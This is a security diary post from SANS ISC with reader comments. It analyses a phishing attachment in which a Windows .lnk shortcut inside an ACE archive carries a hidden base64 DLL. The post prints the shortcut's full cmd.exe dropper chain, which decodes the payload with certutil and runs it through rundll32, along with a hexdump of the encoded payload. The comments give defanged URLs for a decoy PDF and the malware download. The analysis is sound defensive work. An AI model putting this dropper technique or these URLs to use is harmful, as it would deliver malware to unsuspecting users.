My next class:

Analyzis of a Malicious .lnk File with an Embedded Payload

Published: 2016-02-24. Last Updated: 2016-02-24 13:16:03 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

We received some feedback today from Nick, a SANS ISC reader who detected an interesting phishing campaign based on an ACE file. I also detected the same kind of file earlier this morning. ACE is an old compression algorithm developed by a German company called e-merge. This file format was popular around the year 2000. Today it almost disappeared and was replaced by more popular formats but ACE files can still be handled by popular tools like WinRAR or WinZIP. The fact that the format is quite old could help to bypass common low-level filters implemented by anti-spam solutions. 
 
The phishing email was a classic one with an attached .RAR file named “faktura.rar". But the file is in fact an ACE file:
# file faktura.rar
faktura.rar: ACE archive data version 20, from Win/32, version 20 to extract, contains AV-String (unregistered), solid
It’s VT score is very low: 2/55 (c5e4e981269209f2b67fc24167fc7ce5)
 
The ACE file contains a .lnk file. Link files are shortcut files used by Microsoft Windows to point to another executable file. The file VT score is also very low: 3/55 (1e56acf7b536d8f87234b4f7846fe0c0). The link file is configured to start minimized in %currentdir%. It points to a command line prompt with arguments that are pretty evil (the output has been formatted for more visibility):
%windir%\system32\cmd.exe /V:ON /c dir %TEMP%\faktura.lnk /s /b >%TEMP%\bwTFO && 
set /p k=<%TEMP%\bwTFO &&
findstr TVqQAA !k!>%TEMP%\bwTFO && 
certutil -decode %TEMP%\bwTFO %TEMP%\bwTFO.dll && 
del %TEMP%\bwTFO !k! && 
rundll32 %TEMP%\bwTFO.dll,PHojcLeWFaI YEfM
A temporary file is created and filled with some malicious code and executed via rundll32. In this case, no macro to download data from a third party website.  The malicious code is simply appended to the link file and starts with the string ‘TVqQAA’:
00000740  a3 41 5d 34 0c e0 a5 4d  97 35 a3 e4 11 bd 29 00  |.A]4...M.5....).|
00000750  50 56 38 75 73 00 00 00  00 0d 0a 54 56 71 51 41  |PV8us......TVqQA|
00000760  41 4d 41 41 41 41 45 41  41 41 41 2f 2f 38 41 41  |AMAAAAEAAAA//8AA|
00000770  4c 67 41 41 41 41 41 41  41 41 41 51 41 41 41 41  |LgAAAAAAAAAQAAAA|
00000780  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000007a0  41 41 41 41 41 41 41 41  41 41 41 75 41 41 41 41  |AAAAAAAAAAAuAAAA|
000007b0  41 34 66 75 67 34 41 74  41 6e 4e 49 62 67 42 54  |A4fug4AtAnNIbgBT|
000007c0  4d 30 68 56 47 68 70 63  79 42 77 63 6d 39 6e 63  |M0hVGhpcyBwcm9nc|
000007d0  6d 46 74 49 47 4e 68 62  6d 35 76 64 43 42 69 5a  |mFtIGNhbm5vdCBiZ|
000007e0  53 42 79 64 57 34 67 61  57 34 67 52 45 39 54 49  |SBydW4gaW4gRE9TI|
000007f0  47 31 76 5a 47 55 75 44  51 30 4b 4a 41 41 41 41  |G1vZGUuDQ0KJAAAA|
00000800  41 41 41 41 41 43 48 6f  38 76 62 77 38 4b 6c 69  |AAAAACHo8vbw8Kli|
00000810  4d 50 43 70 59 6a 44 77  71 57 49 50 2b 4b 33 69  |MPCpYjDwqWIP+K3i|
00000820  4d 4c 43 70 59 67 45 78  4b 4f 49 77 73 4b 6c 69  |MLCpYgExKOIwsKli|
00000830  45 33 64 74 6f 6a 43 77  71 57 49 55 6d 6c 6a 61  |E3dtojCwqWIUmlja|
00000840  4d 50 43 70 59 67 41 41  41 41 41 41 41 41 41 41  |MPCpYgAAAAAAAAAA|
00000850  46 42 46 41 41 42 4d 41  51 55 41 4b 53 54 4b 56  |FBFAABMAQUAKSTKV|
00000860  67 41 41 41 41 41 41 41  41 41 41 34 41 41 4f 49  |gAAAAAAAAAA4AAOI|
00000870  51 73 42 42 51 77 41 44  41 41 41 41 41 67 41 41  |QsBBQwADAAAAAgAA|
00000880  41 41 41 41 41 41 41 45  41 41 41 41 42 41 41 41  |AAAAAAAEAAAABAAA|
00000890  41 41 67 41 41 41 41 41  41 41 51 41 42 41 41 41  |AAgAAAAAAAQABAAA|
000008a0  41 41 43 41 41 41 45 41  41 41 41 41 41 41 41 41  |AACAAAEAAAAAAAAA| 

You can see immediately that the code is BASE64 encoded and can be extracted quite easily:

# strings faktura.lnk | grep TVqQAA | base64 -d - >malicious.bin
# file malicious.bin
malicious.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
The PE file has a VT score of 1/55 (a911640a5dd4bca99c31eeac18e90901). I'll have a look at this binary later because it was not reported as malicious by the FireEye appliance that analyzed it.
 
Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key
2 comment(s)
My next class:

Comments

Xavier,

Is there more about the LNK file you can share? Shell item ID List? Any MAC address?

Thanks.
Hi Xavier,

The binary is a trojan downloader that executes a pdf decoy.

Decoy PDF link: hxxps://drive.google.com/file/d/0B5xpJCkMMHu_VWw1VWFxQmdVNkU/view?pref=2&pli=1
Malicious Payload link: hxxp://mispelarate.ru/s8j0k6b4s3q2d/c.php?add=q2w3e4r5t6y7u8i9o0

The payload is dropped inside temp folder.

Kindly share us your findings...

Thanks!

Diary Archives